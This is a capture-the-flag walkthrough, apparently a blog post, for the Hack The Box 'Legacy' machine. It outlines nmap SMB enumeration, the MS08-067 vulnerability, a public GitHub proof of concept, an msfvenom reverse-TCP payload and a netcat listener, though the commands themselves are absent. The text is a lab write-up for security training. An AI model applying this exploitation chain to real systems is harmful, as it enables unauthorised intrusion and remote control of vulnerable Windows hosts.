Hack The Box - Legacy Walkthrough without Metasploit
Enumeration
We start using nmap to enumerate the box with the following flags:
-sC Script scan, equivalent to --script=default
-sV Service version info
-A Enable OS detection, version detection, script scanning, and traceroute
We have SMB port 445 open so we can run nmap againg with vulnerability script on that port, the OS part will be useful later.
Since there are multiple smb-vuln scripts, with the last * we will run them all on port 445 of our victim box.
It is vulnerable to CVE-2008-4250 (MS08-067) which affects the systems that have highest chances to be running in our victim.
Finding the PoC
With a quick google search we can find this github repository:
https://github.com/andyacer/ms08_067/
It's a great resource that will let us place there our msfvenom payload and execute it in order to exploit the vulnerability.
Modifying the PoC
This will generate a reverse tcp for a 32 bits Windows, excluding the characters indicated with the -b flag.
This part of the exploit is the one that we will change with our own msfvenom payload.
Executing the PoC
First we should have a netcat listening already set in order to catch the reverse tcp shell.
We might run into this problem while trying to execute the exploit:
In order to fix it we just need to install Impacket and PyCrypto.
For Impacket:
For PyCrypto:
Once we have that fixed we can just execute it with the arguments needed.
According with our previous enumeration we had high chances for this box to be Windows XP SP3, so we tested with option 6.
Pwnd
Last updated
